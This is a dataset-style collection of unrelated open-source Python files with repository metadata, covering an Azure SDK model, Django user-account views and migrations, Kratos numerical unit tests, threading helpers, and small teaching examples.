]):
raise exceptions.ToolException('At least one property must be modified.')
|
[
"[email protected]"
] | |
6fd38298e6c06da5b7a9c85a6acb9e33eaaa8531
|
e4ec5b6cf3cfe2568ef0b5654c019e398b4ecc67
|
/azure-cli/2.0.18/libexec/lib/python3.6/site-packages/azure/mgmt/network/v2016_12_01/models/flow_log_information.py
|
ad2b8721b840a00057bc3671a586e0b6b65dddb0
|
[] |
no_license
|
EnjoyLifeFund/macHighSierra-cellars
|
59051e496ed0e68d14e0d5d91367a2c92c95e1fb
|
49a477d42f081e52f4c5bdd39535156a2df52d09
|
refs/heads/master
| 2022-12-25T19:28:29.992466 | 2017-10-10T13:00:08 | 2017-10-10T13:00:08 | 96,081,471 | 3 | 1 | null | 2022-12-17T02:26:21 | 2017-07-03T07:17:34 | null |
UTF-8
|
Python
| false | false | 1,856 |
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class FlowLogInformation(Model):
"""Information on the configuration of flow log.
:param target_resource_id: The ID of the resource to configure for flow
logging.
:type target_resource_id: str
:param storage_id: ID of the storage account which is used to store the
flow log.
:type storage_id: str
:param enabled: Flag to enable/disable flow logging.
:type enabled: bool
:param retention_policy:
:type retention_policy: :class:`RetentionPolicyParameters
<azure.mgmt.network.v2016_12_01.models.RetentionPolicyParameters>`
"""
_validation = {
'target_resource_id': {'required': True},
'storage_id': {'required': True},
'enabled': {'required': True},
}
_attribute_map = {
'target_resource_id': {'key': 'targetResourceId', 'type': 'str'},
'storage_id': {'key': 'properties.storageId', 'type': 'str'},
'enabled': {'key': 'properties.enabled', 'type': 'bool'},
'retention_policy': {'key': 'properties.retentionPolicy', 'type': 'RetentionPolicyParameters'},
}
def __init__(self, target_resource_id, storage_id, enabled, retention_policy=None):
self.target_resource_id = target_resource_id
self.storage_id = storage_id
self.enabled = enabled
self.retention_policy = retention_policy
|
[
"[email protected]"
] | |
97e33fe4f5d5aefa00b2158878f7bc01c15bd8ec
|
dc99adb79f15b3889a7ef6139cfe5dfc614889b8
|
/Aplikace_1_0/Source/ewitis/data/db.py
|
26dacf3f02ebbf16712e8a6bc349676538d6df44
|
[] |
no_license
|
meloun/ew_aplikace
|
95d1e4063a149a10bb3a96f372691b5110c26b7b
|
f890c020ad8d3d224f796dab3f1f222c1f6ba0eb
|
refs/heads/master
| 2023-04-28T06:43:12.252105 | 2023-04-18T19:59:36 | 2023-04-18T19:59:36 | 2,674,595 | 0 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 417 |
py
|
'''
Created on 8.12.2013
@author: Meloun
'''
import libs.sqlite.sqlite as sqlite
#=======================================================================
# DATABASE
#=======================================================================
print "I: Database init"
try:
db = sqlite.sqlite_db("db/test_db.sqlite")
db.connect()
except:
print "E: Database"
|
[
"[email protected]"
] | |
7605014773f49f01d2f7d6e63c97b2e5e3735fd1
|
da687718aa8ce62974090af63d25e057262e9dfe
|
/cap12-dicionarios/dicionarios_aninhados/inventario2.py
|
16e00d7872c4b80f9ecb062d75e3ca72f267f1e7
|
[] |
no_license
|
frclasso/revisao_Python_modulo1
|
77928fa4409c97d49cc7deccdf291f44c337d290
|
1e83d0ef9657440db46a8e84b136ac5f9a7c556e
|
refs/heads/master
| 2020-06-25T05:37:28.768343 | 2019-07-27T22:23:58 | 2019-07-27T22:23:58 | 199,217,969 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 360 |
py
|
#!/usr/bin/env python3
inventory = {'Sword': {'attack': 5, 'defence': 1,
'weight':15, 'price': 2},
'Armor':{'attack':0, 'defence': 10,
'weight':25, 'price': 5}
}
for name, item in inventory.items():
print('{0}: {1[attack]} {1[defence]} {1[weight]} {1[price]}'.format(name, item))
|
[
"[email protected]"
] | |
ebb3dff07a902763e88bf53719711bec7c75ff06
|
ae6c2a6fa37613ac31b2bd3537b3276c9b333632
|
/search/migrations/0012_auto_20170822_1207.py
|
576f43db2917f84833616caefcb3759c3b8b7f67
|
[
"Apache-2.0"
] |
permissive
|
salopensource/sal
|
435a31904eb83048c02c9fbff02bbf832835d1b4
|
0895106c6729d5465da5e21a810e967a73ed6e24
|
refs/heads/main
| 2023-08-03T06:53:40.142752 | 2023-07-28T15:51:08 | 2023-07-28T15:51:08 | 35,883,375 | 227 | 94 |
Apache-2.0
| 2023-07-28T15:51:10 | 2015-05-19T13:21:57 |
Python
|
UTF-8
|
Python
| false | false | 451 |
py
|
# Generated by Django 1.10 on 2017-08-22 19:07
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('search', '0011_auto_20170810_1205'),
]
operations = [
migrations.AlterField(
model_name='savedsearch',
name='name',
field=models.CharField(blank=True, max_length=100, null=True),
),
]
|
[
"[email protected]"
] | |
ca4adf24f6c210b339e3770daa1efd98e8b87ce2
|
d5fbec8208b9a65032bdd2b550c7dde795d5661b
|
/kratos/tests/test_time_discretization.py
|
34fec9075ad0f9577ad12f0fb7482af71a49a096
|
[
"BSD-3-Clause"
] |
permissive
|
Ginux1994/Kratos
|
9dc5f7b5a427b0a258cd01fbd0bffae19571a81a
|
2893e855a07e5cb3b0e6bc549c646fca4a525a99
|
refs/heads/master
| 2020-04-10T16:49:50.748887 | 2018-12-10T09:43:37 | 2018-12-10T09:43:37 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,588 |
py
|
from __future__ import print_function, absolute_import, division
import KratosMultiphysics as KM
import KratosMultiphysics.KratosUnittest as KratosUnittest
class TestTimeDiscretization(KratosUnittest.TestCase):
def test_BDF1(self):
bdf = KM.BDF1()
delta_time = 0.11
coeffs = bdf.ComputeBDFCoefficients(delta_time)
self.assertEqual(len(coeffs), 2)
self.assertAlmostEqual(coeffs[0], 1.0/delta_time)
self.assertAlmostEqual(coeffs[1], -1.0/delta_time)
self.assertEqual(KM.GetMinimumBufferSize(bdf), 2)
def test_BDF2(self):
bdf = KM.BDF2()
delta_time = 0.11
prev_delta_time = 0.089
coeffs = bdf.ComputeBDFCoefficients(delta_time, prev_delta_time)
self.assertEqual(len(coeffs), 3)
rho = prev_delta_time / delta_time;
time_coeff = 1.0 / (delta_time * rho * rho + delta_time * rho);
self.assertAlmostEqual(coeffs[0], time_coeff * (rho * rho + 2.0 * rho))
self.assertAlmostEqual(coeffs[1], -time_coeff * (rho * rho + 2.0 * rho + 1.0))
self.assertAlmostEqual(coeffs[2], time_coeff)
self.assertEqual(KM.GetMinimumBufferSize(bdf), 3)
def test_BDF3(self):
bdf = KM.BDF3()
delta_time = 0.11
coeffs = bdf.ComputeBDFCoefficients(delta_time)
self.assertEqual(len(coeffs), 4)
self.assertAlmostEqual(coeffs[0], 11.0/(6.0*delta_time))
self.assertAlmostEqual(coeffs[1], -18.0/(6.0*delta_time))
self.assertAlmostEqual(coeffs[2], 9.0/(6.0*delta_time))
self.assertAlmostEqual(coeffs[3], -2.0/(6.0*delta_time))
self.assertEqual(KM.GetMinimumBufferSize(bdf), 4)
def test_BDF4(self):
bdf = KM.BDF4()
delta_time = 0.11
coeffs = bdf.ComputeBDFCoefficients(delta_time)
self.assertEqual(len(coeffs), 5)
self.assertAlmostEqual(coeffs[0], 25.0/(12.0*delta_time))
self.assertAlmostEqual(coeffs[1], -48.0/(12.0*delta_time))
self.assertAlmostEqual(coeffs[2], 36.0/(12.0*delta_time))
self.assertAlmostEqual(coeffs[3], -16.0/(12.0*delta_time))
self.assertAlmostEqual(coeffs[4], 3.0/(12.0*delta_time))
self.assertEqual(KM.GetMinimumBufferSize(bdf), 5)
def test_BDF5(self):
bdf = KM.BDF5()
delta_time = 0.11
coeffs = bdf.ComputeBDFCoefficients(delta_time)
self.assertEqual(len(coeffs), 6)
self.assertAlmostEqual(coeffs[0], 137.0/(60.0*delta_time))
self.assertAlmostEqual(coeffs[1], -300.0/(60.0*delta_time))
self.assertAlmostEqual(coeffs[2], 300.0/(60.0*delta_time))
self.assertAlmostEqual(coeffs[3], -200.0/(60.0*delta_time))
self.assertAlmostEqual(coeffs[4], 75.0/(60.0*delta_time))
self.assertAlmostEqual(coeffs[5], -12.0/(60.0*delta_time))
self.assertEqual(KM.GetMinimumBufferSize(bdf), 6)
def test_BDF6(self):
bdf = KM.BDF6()
delta_time = 0.11
coeffs = bdf.ComputeBDFCoefficients(delta_time)
self.assertEqual(len(coeffs), 7)
self.assertAlmostEqual(coeffs[0], 147.0/(60.0*delta_time))
self.assertAlmostEqual(coeffs[1], -360.0/(60.0*delta_time))
self.assertAlmostEqual(coeffs[2], 450.0/(60.0*delta_time))
self.assertAlmostEqual(coeffs[3], -400.0/(60.0*delta_time))
self.assertAlmostEqual(coeffs[4], 225.0/(60.0*delta_time))
self.assertAlmostEqual(coeffs[5], -72.0/(60.0*delta_time))
self.assertAlmostEqual(coeffs[6], 10.0/(60.0*delta_time))
self.assertEqual(KM.GetMinimumBufferSize(bdf), 7)
def test_Newmark(self):
gen_alpha = KM.Newmark()
self.assertAlmostEqual(gen_alpha.GetBeta(), 0.25)
self.assertAlmostEqual(gen_alpha.GetGamma(), 0.5)
self.assertEqual(KM.GetMinimumBufferSize(gen_alpha), 2)
def test_Bossak(self):
gen_alpha = KM.Bossak()
self.assertAlmostEqual(gen_alpha.GetBeta(), 0.2)
self.assertAlmostEqual(gen_alpha.GetGamma(), 0.1225)
self.assertAlmostEqual(gen_alpha.GetAlphaM(), -0.3)
self.assertEqual(KM.GetMinimumBufferSize(gen_alpha), 2)
def test_GeneralizedAlpha(self):
gen_alpha = KM.GeneralizedAlpha()
self.assertAlmostEqual(gen_alpha.GetBeta(), 0.2)
self.assertAlmostEqual(gen_alpha.GetGamma(), 0.1225)
self.assertAlmostEqual(gen_alpha.GetAlphaM(), -0.3)
self.assertAlmostEqual(gen_alpha.GetAlphaF(), 0.0)
self.assertEqual(KM.GetMinimumBufferSize(gen_alpha), 2)
if __name__ == '__main__':
KratosUnittest.main()
|
[
"[email protected]"
] | |
4def4a44ca4457ea04f4023ba49dae670040dc78
|
bc183f7357cda3ad064f8c2ff34a176c406446d3
|
/pastepwn/util/threadingutils.py
|
54451a26289cd5ba3667d162722837819e9aadcf
|
[
"MIT"
] |
permissive
|
luton1507/pastepwn
|
b8a790168ce08f10c62574eeb0a68f0dedd5425d
|
9b2fee22857e54a5312fdb3d388b472a7d271c50
|
refs/heads/master
| 2022-11-10T20:18:40.102277 | 2020-06-19T23:34:14 | 2020-06-19T23:34:14 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,915 |
py
|
# -*- coding: utf-8 -*-
import logging
from threading import Thread, current_thread
def start_thread(target, name, exception_event, *args, **kwargs):
"""
Starts a thread passed as argument and catches exceptions that happens during execution
:param target: Method to be executed in the thread
:param name: Name of the thread
:param exception_event: An event that will be set if an exception occurred
:param args: Arguments to be passed to the threaded method
:param kwargs: Keyword-Arguments to be passed to the threaded method
:return:
"""
thread = Thread(target=thread_wrapper, name=name, args=(target, exception_event) + args, kwargs=kwargs)
thread.start()
return thread
def thread_wrapper(target, exception_event, *args, **kwargs):
"""
Wrapper around the execution of a passed method, that catches and logs exceptions
:param target: Method to be executed
:param exception_event: An event that will be set if an exception occurred
:param args: Arguments to be passed to the target method
:param kwargs: Keyword-Arguments to be passed to the target method
:return:
"""
thread_name = current_thread().name
logger = logging.getLogger(__name__)
logger.debug('{0} - thread started'.format(thread_name))
try:
target(*args, **kwargs)
except Exception:
exception_event.set()
logger.exception('unhandled exception in %s', thread_name)
raise
logger.debug('{0} - thread ended'.format(thread_name))
def join_threads(threads):
"""
End all threads and join them back into the main thread
:param threads: List of threads to be joined
:return:
"""
logger = logging.getLogger(__name__)
for thread in threads:
logger.debug("Joining thread {0}".format(thread.name))
thread.join()
logger.debug("Thread {0} has ended".format(thread.name))
|
[
"[email protected]"
] | |
5955661160554d40102fc8a32fa5b056bbf75e99
|
f0a4ba1f1f941092e68e4b1ef9cff0d3852199ef
|
/Do_it!/5.재귀 알고리즘/비재귀적 표현-재귀를제거.py
|
5c4d998075cc37ef533ac96b4ff5819b45653e53
|
[] |
no_license
|
lsb530/Algorithm-Python
|
d41ddd3ca7675f6a69d322a4646d75801f0022b2
|
a48c6df50567c9943b5d7218f874a5c0a85fcc6d
|
refs/heads/master
| 2023-06-18T04:36:09.221769 | 2021-06-28T16:49:35 | 2021-06-28T16:49:35 | 367,775,760 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 594 |
py
|
# 스택으로 재귀 함수 구현하기(재귀를 제거)
from stack import Stack # stack.py의 Stack 클래스를 임포트
def recur(n: int) -> int:
"""재귀를 제거한 recur() 함수"""
s = Stack(n)
while True:
if n > 0:
s.push(n) # n값을 푸시
n = n - 1
continue
if not s.is_empty(): # 스택이 비어있지 않으면
n = s.pop() # 저장한 값을 n에 팝
print(n)
n = n - 2
continue
break
x = int(input('정숫값을 입력하세요 : '))
recur(x)
|
[
"[email protected]"
] | |
4e302d4189e5a495aee3296edc2d2144b00d4046
|
951a77d2ff181b045104f1482ed6910869733ec9
|
/apps/user/views.py
|
493dad7fa6d6d5d36f5f322e74849f177baa0cee
|
[
"Apache-2.0"
] |
permissive
|
fblrainbow/ShopPro
|
7d89b7d3ba5dd2ba470b0d46114893e2e83513c1
|
f0cec134ae77f4449f15a0219123d6a6bce2aad2
|
refs/heads/master
| 2023-07-28T18:32:12.116290 | 2019-02-24T08:11:34 | 2019-02-24T08:11:34 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 11,311 |
py
|
from django.shortcuts import render
import json
from django.shortcuts import render, get_object_or_404, reverse
from django.http import HttpResponseRedirect, JsonResponse, HttpResponse
# 基于类的视图 继承类
from django.views.generic.base import View
# 引入需要的数据表
from .models import UserProfile, EmailVerifyRecord, Address
# 完成并集查询
from django.db.models import Q
# 定义使用邮箱进行登陆 重载方法
from django.contrib.auth.backends import ModelBackend
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.hashers import make_password
from django.contrib.auth.decorators import login_required
# 注册/找回密码 邮箱验证
# from utils.email_sent import sent_register_email
# 异步发送邮件
from .tasks import sent_register_email
# 对数据库找出来的内容进行分页
from django.core.paginator import Paginator
from ShopPro.settings import PAGE_SETTING
# 添加消息
from django.contrib import messages
# 发送邮件测试函数
class EmailTestView(View):
def get(self, request):
sent_register_email.delay('[email protected]', 'register')
return HttpResponse("发送成功!")
# 重构 允许使用邮箱/用户名进行登陆
class CustomBackend(ModelBackend):
def authenticate(self, username=None, password=None, **kwargs):
try:
user = UserProfile.objects.get(Q(username=username) | Q(email=username))
if user.check_password(password):
return user
except Exception as e:
return None
# 用户注册
class RegisterView(View):
def get(self, request):
# 如果已经登陆 跳转到主页
if request.user.is_authenticated:
return HttpResponseRedirect(reverse("index"))
return render(request, "user/register.html", {})
def post(self, request):
username = request.POST.get("user_name", "")
pwd = request.POST.get("pwd", "")
email = request.POST.get("email", "")
if all([username, email, pwd]):
result = UserProfile.objects.filter(username=username).first()
if result:
# 当前用户名已经注册
return render(request, 'user/register.html',
{"msg": "用户名被占用!"})
user = UserProfile(username=username, email=email, password=make_password(pwd), is_active=False)
user.save()
print("收到注册请求 准备发送邮箱验证码")
# 发送邮件 激活==需要异步
sent_register_email.delay(email, "register")
# sent_register_email(email, "register")
# 完成注册操作
return render(request, 'user/register_complate.html',
{"email": email})
else:
return render(request, 'user/register.html',
{"msg": "用户名/邮箱/密码均不能为空!"})
# 用户激活
class ActivateView(View):
def get(self, request):
# 如果已经登陆 跳转到主页
if request.user.is_authenticated:
return HttpResponseRedirect(reverse("index"))
codes = request.GET.get("code")
code = EmailVerifyRecord.objects.filter(code=codes).first()
if code:
email = code.email
user = UserProfile.objects.get(email=email)
user.is_active = True
user.save()
# 激活成功 跳转到登陆页面
return HttpResponseRedirect(reverse("login"))
else:
# 激活失败 跳转到注册页
return HttpResponseRedirect(reverse("register"))
def post(self, request):
return render(request, "product/index.html",
{})
# 用户登陆
class LoginView(View):
def get(self, request):
# 如果已经登陆 跳转到主页
if request.user.is_authenticated:
return HttpResponseRedirect(reverse('index'))
return render(request, "user/login.html", {})
def post(self, request):
# 验证登陆是否成功
username = request.POST.get("username", "")
pwd = request.POST.get("pwd", "")
# print("用户名:{} 密码:{}".format(username, pwd))
if all([username, pwd]):
user = authenticate(username=username, password=pwd)
if user:
if UserProfile.objects.get(username=username).is_active:
login(request, user)
return HttpResponseRedirect(reverse('index'))
else:
return render(request, "user/login.html",
{"msg": "用户尚未激活!去邮箱激活!"})
return render(request, "user/login.html",
{"msg": "用户名或密码错误!"})
# 退出登陆
class LogoutView(View):
# 退出登陆 跳转到登陆页面
def get(self, request):
# 如果已经登陆 跳转到主页
if request.user.is_authenticated:
# 已经登陆 退出登陆
logout(request)
return HttpResponseRedirect(reverse('login'))
return HttpResponseRedirect(reverse("index"))
# 原则上 该视图不会用到
def post(self, request):
return render(request, "product/index.html", {})
# 忘记密码/修改密码 后期完成
class ForgetPwdView(View):
def get(self, request):
# 如果已经登陆 跳转到主页
if request.user.is_authenticated:
return HttpResponseRedirect(reverse("index"))
return render(request, "user/find_pwd.html", {})
def post(self, request):
# 输入邮箱--给邮箱发送验证码--
username = request.POST.get("username", "")
email = request.POST.get("email", "")
if all([username, email]):
# 验证用户名和邮箱是否属于同一个用户
result = UserProfile.objects.filter(
username=username,
email=email
).first()
if result:
# 发送邮件
sent_register_email.delay(email, "forget")
# sent_register_email(email, "forget")
return render(request, "user/find_complate.html",
{"email": email})
return render(request, 'user/find_pwd.html',
{"msg": "您输入的用户名或邮箱不对"})
# 检查用户名/邮箱是否一致
class CheckUserEmailView(View):
def post(self, request):
username = request.POST.get("username", "")
email = request.POST.get("email", "")
if all([username, email]):
# 验证用户名和邮箱是否属于同一个用户
result = UserProfile.objects.filter(
username=username,
email=email
).first()
if result:
data = {
"code": 3,
"msg": "ok"
}
else:
data = {
"code": 0,
"msg": "用户名或邮箱不存在"
}
else:
data = {
"code": 0,
"msg": "用户名或邮箱不能为空"
}
return JsonResponse(data)
# 重置密码
class ResetPwdView(View):
def get(self, request):
# 如果已经登陆 跳转到主页
if request.user.is_authenticated:
return HttpResponseRedirect(reverse("index"))
code = request.GET.get("code", "")
if code:
# 找到该验证码
all_code = EmailVerifyRecord.objects.filter(code=code).last()
if all_code:
email = all_code.email
return render(request, "user/reset_pwd.html",
{"email": email})
return render(request, "product/index.html")
# 提交新密码
def post(self, request):
pwd = request.POST.get("pwd", "")
email = request.POST.get("email", "")
if all([pwd, email]):
user = UserProfile.objects.filter(email=email).first()
user.password = make_password(password=pwd)
user.save()
data = {
"code": 3,
"msg": "密码修改成功"
}
# return HttpResponseRedirect(reverse("login"))
else:
data = {
"code": 0,
"msg": "密码修改失败"
}
# return render(request, "product/index.html")
return JsonResponse(data)
# 个人中心
class InfoView(View):
def get(self, request):
if request.user.is_authenticated:
user = UserProfile.objects.filter(username=request.user.username).first()
return render(request, "user/user_center_info.html",
{"user": user, })
else:
return render(request, 'user/login.html')
def post(self, request):
return render(request, "", {})
# 所有地址
class AddressView(View):
def get(self, request):
if request.user.is_authenticated:
address_list = Address.objects.filter(user_id=request.user.id).all()
return render(request, "user/user_center_site.html",
{"address_list": address_list})
else:
return render(request, 'user/login.html')
# 新增地址
def post(self, request):
if request.user.is_authenticated:
is_default = request.POST.get("is_default", False)
if is_default:
is_default = True
name = request.POST.get("name", "")
s_province = request.POST.get("s_province", "")
s_city = request.POST.get("s_city", "")
s_county = request.POST.get("s_county", "")
detail = request.POST.get("detail_area", "")
zip_code = request.POST.get("code", "")
mobile = request.POST.get("mobile", "")
base_add = "{} {} {}".format(s_province, s_city, s_county)
if all([is_default, base_add, detail, zip_code, mobile, name]):
address_info = Address(
user_id=request.user.id,
is_default=is_default, address=base_add,
detail=detail, zip_code=zip_code,
mobile=mobile, name=name,
)
address_info.save()
data = {
"code": 3,
"msg": "添加成功",
}
else:
data = {
"code": 0,
"msg": "添加失败",
}
else:
data = {
"code": 0,
"msg": "添加失败",
}
return JsonResponse(data)
# 我的钱包
class WalletView(View):
def get(self, request):
return render(request, "", {})
def post(self, request):
return render(request, "", {})
# 我的优惠券
class CouponView(View):
def get(self, request):
return render(request, "", {})
def post(self, request):
return render(request, "", {})
|
[
"[email protected]"
] | |
437500d29d4bb52a2d7175702b3a9674cc625015
|
0562a138eaa1b460a6bf94f4a724b32a79186900
|
/aat/common.py
|
55e9be1071ca53160b581ef93e4a7e908cf04fc9
|
[
"Apache-2.0"
] |
permissive
|
sylinuxhy/aat
|
15dc00bda32aed91aaad5c6122982114874342e4
|
8113365e6f0c307156d43c0dee594bf66ff8b4fa
|
refs/heads/main
| 2023-01-28T06:49:58.646911 | 2020-12-05T01:31:15 | 2020-12-05T01:31:15 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,554 |
py
|
import os
import itertools
import functools
import pandas as pd # type: ignore
@functools.lru_cache()
def _in_cpp():
_cpp = os.environ.get("AAT_USE_CPP", "").lower() in ("1", "on")
try:
from aat.binding import ( # type: ignore # noqa: F401
SideCpp,
EventTypeCpp,
DataTypeCpp,
InstrumentTypeCpp,
OrderTypeCpp,
OrderFlagCpp,
OrderBookCpp,
ExchangeTypeCpp,
InstrumentCpp,
DataCpp,
EventCpp,
OrderCpp,
TradeCpp,
)
except ImportError:
if _cpp:
# raise if being told to use c++
raise
return False
return _cpp
def id_generator():
__c = itertools.count()
def _gen_id():
return next(__c)
return _gen_id
def _merge(lst1, lst2, sum=True):
"""merge two lists of (val, datetime) and accumulate"""
df1 = pd.DataFrame(lst1, columns=("val1", "date1"))
df1.set_index("date1", inplace=True)
# df1.drop_duplicates(inplace=True)
df2 = pd.DataFrame(lst2, columns=("val2", "date2"))
df2.set_index("date2", inplace=True)
# df2.drop_duplicates(inplace=True)
df = df1.join(df2, how="outer")
# df = pd.concat([df1, df2], axis=1)
df.fillna(method="ffill", inplace=True)
df.fillna(0.0, inplace=True)
if sum:
df = df.sum(axis=1)
else:
df = df.mean(axis=1)
df = df.reset_index().values.tolist()
return [(b, a.to_pydatetime()) for a, b in df]
|
[
"[email protected]"
] | |
72343fcac5794c27da7dd3512015ec98664b8821
|
f5d1ef8ea6173b3b380fa2985fe346162a0b68b3
|
/740_Delete_and_Earn.py
|
fb379e2b588d56ce1b72bdf0c95366aea22dbdde
|
[] |
no_license
|
ZDawang/leetcode
|
a66801a2ed5b06ee4e489613885a22e3130618c7
|
a46b07adec6a8cb7e331e0b985d88cd34a3d5667
|
refs/heads/master
| 2021-09-11T15:21:36.496025 | 2018-04-09T06:28:56 | 2018-04-09T06:28:56 | 111,512,346 | 8 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,596 |
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#author : zhangdawang
#data: 2017-12
#difficulty degree:
#problem: 740_Delete_and_Earn
#time_complecity:
#space_complecity:
#beats:
from collections import Counter
class Solution(object):
#DP
#使用dp[i]来存储到第i小个数,且删除第i小个数所获得的最大分数
#所以如果第i小个数=第i-1小个数+1:dp[i] = max(dp[j] for j in range(i - 1)) + n * c
#否则dp[i] = max(dp[j] for j in range(i)) + n * c
#空间O(n),时间最差O(nlogn)(排序)
def deleteAndEarn(self, nums):
if not nums: return 0
#计数并从小到大排序
count = sorted(Counter(nums).items(), key = lambda x: x[0])
dp = [0] * len(count)
#用来存放0到第i-2个数(包括第i-2)的最大点数。
maxpoint = 0
for i, (n, c) in enumerate(count):
if n - 1 == count[i - 1][0]:
dp[i] = maxpoint + n * c
else:
dp[i] = max(maxpoint, dp[i - 1]) + n * c
maxpoint = max(maxpoint, dp[i - 1])
return max(dp[-1], maxpoint)
#优化空间复杂度,O(1),错了,还是O(n),count占的空间
def deleteAndEarn2(self, nums):
count = sorted(Counter(nums).items(), key = lambda x: x[0])
cur, pre, mp = 0, 0, 0
for i, (n, c) in enumerate(count):
cur = (mp if n - 1 == count[i - 1][0] else max(mp, pre)) + n * c
mp, pre = max(mp, pre), cur
return max(cur, mp)
nums = [1,1,1,2,4,5,5,5,6]
solute = Solution()
res = solute.deleteAndEarn(nums)
|
[
"[email protected]"
] | |
171ed97b60c4f2239961de9c02cdc8a7beeb2300
|
8981902427dc577228dfd5611c6afe86c3e2e9e2
|
/dsmr_stats/management/commands/dsmr_stats_fake_development_data.py
|
0539470d7d311df505ea9ed974563875060356e9
|
[] |
no_license
|
genie137/dsmr-reader
|
5515f4f92bb05bcf00f0e8a0fbd1a018d408950b
|
4d934b4838cb2de4a66ff193f4f3095e9beecd99
|
refs/heads/master
| 2020-03-21T18:14:05.182137 | 2018-06-12T14:54:55 | 2018-06-12T14:54:55 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,248 |
py
|
from decimal import Decimal
from time import sleep
import random
from django.core.management.base import BaseCommand, CommandError
from django.utils.translation import ugettext as _
from django.conf import settings
from django.db import models
from dsmr_stats.models.statistics import DayStatistics, HourStatistics
from dsmr_consumption.models.consumption import ElectricityConsumption
from dsmr_datalogger.models.reading import DsmrReading
class Command(BaseCommand):
help = _('Alters any stats generate to fake data. DO NOT USE in production! Used for integration checks.')
def add_arguments(self, parser):
super(Command, self).add_arguments(parser)
parser.add_argument(
'--ack-to-mess-up-my-data',
action='store_true',
dest='acked_warning',
default=False,
help=_('Required option to acknowledge you that you WILL mess up your data with this.')
)
def handle(self, **options):
""" InfiniteManagementCommandMixin listens to handle() and calls run() in a loop. """
if not settings.DEBUG:
raise CommandError(_('Intended usage is NOT production! Only allowed when DEBUG = True'))
if not options.get('acked_warning'):
raise CommandError(_('Intended usage is NOT production! Force by using --ack-to-mess-up-my-data'))
self._randomize()
def _randomize(self):
""" Generates 'random' stats data by altering existing ones. """
factor = Decimal(random.random()) # Between 0.0 and 1.0, change every day.
print('Using existing consumption as base, multiplied by {}'.format(factor))
sleep(1) # Allow to abort when random number sucks.
print('Altering readings... (might take quite some time)')
DsmrReading.objects.all().order_by('-pk').update(
electricity_returned_1=models.F('electricity_delivered_1') * factor,
electricity_returned_2=models.F('electricity_delivered_2') * factor,
electricity_currently_returned=models.F('electricity_currently_delivered') * factor,
)
print('Altering electricity consumption... (might take quite some time as well)')
ElectricityConsumption.objects.all().update(
returned_1=models.F('delivered_1') * factor,
returned_2=models.F('delivered_2') * factor,
currently_returned=models.F('currently_delivered') * factor,
phase_currently_delivered_l1=models.F('currently_delivered') * factor, # Split.
phase_currently_delivered_l2=models.F('currently_delivered') * (1 - factor), # Remainder of split.
phase_currently_delivered_l3=0.005, # Weird constant, to keep it simple.
)
print('Altering hour statistics...')
HourStatistics.objects.all().update(
electricity1_returned=models.F('electricity1') * factor,
electricity2_returned=models.F('electricity2') * factor,
)
print('Altering day statistics...')
DayStatistics.objects.all().update(
electricity1_returned=models.F('electricity1') * factor,
electricity2_returned=models.F('electricity2') * factor,
)
print('Done!')
|
[
"[email protected]"
] | |
dfa2a73bf800f4035448f9edb1d2a68fba40626f
|
344dfd891cde88940c86f1d488d426c79c3825ac
|
/w10/G3/test3/myenv/bin/easy_install-2.7
|
98dbd04132e797effef22e10a48cc7c95dd3956e
|
[] |
no_license
|
bobur554396/WT2018Spring
|
b32b02d4ffdc1598fb41322e97cecc0eeffa92b3
|
6a79748747991aa1e28b359a72ddf3a9b3a9d1d0
|
refs/heads/master
| 2021-05-11T00:53:05.640173 | 2018-04-13T05:12:33 | 2018-04-13T05:12:33 | 118,312,848 | 3 | 4 | null | null | null | null |
UTF-8
|
Python
| false | false | 276 |
7
|
#!/Users/bobur/Desktop/work/django/WT/test3/myenv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"[email protected]"
] | |
2edcd772211818912e2e90300d4d51ee3e1717dc
|
b84842cfa24fce5b1a8d093bdf45885b0f5ab434
|
/configuration/appcaching/main.py
|
f45cc7805c1e496dbdcc9f2b7eef110336613c36
|
[] |
no_license
|
CodedQuen/Programming-Google-App-Engine
|
fc0f4572a60f3d91f08a15f2b2d19d71673d2de6
|
bd3430b84db6477737a7332a358ed37a6ea36b23
|
refs/heads/master
| 2022-04-25T01:14:08.620872 | 2020-04-30T07:02:26 | 2020-04-30T07:02:26 | 260,136,667 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,873 |
py
|
import datetime
import webapp2
# An app instance global.
app_counter = 0
class MainPage(webapp2.RequestHandler):
# A class variable.
cls_counter = 0
def __init__(self, *args, **kwargs):
super(MainPage, self).__init__(*args, **kwargs)
# A handler instance variable.
self.counter = 0
def incr_and_print_counter(self):
global app_counter
app_counter += 1
MainPage.cls_counter += 1
self.counter += 1
self.response.write('<p>App counter: %d</p>' % app_counter)
self.response.write('<p>Class counter: %d</p>' % MainPage.cls_counter)
self.response.write('<p>Object counter: %d</p>' % self.counter)
def get(self):
self.response.write('''
<p>This request handler accesses and modifies three counter variables: a module global, a class global, and an handler object member. When App Engine starts a new instance for an app, its memory begins empty. The first request handled by a request handler on the instance imports the <code>main</code> module, which initializes the module global and class global to zero (0). App Engine constructs a new instance of the <code>MainPage</code> class for each request, which initializes its instance member counter.</p>
<p>When you reload this page, the module and class globals may change depending on which instance handles your request, and how many previous requests the instance has handled. This number may fluctuate as new instances are started and requests are distributed across live instances. The object counter remains at 1, because each request gets its own handler object.</p>
''')
self.incr_and_print_counter()
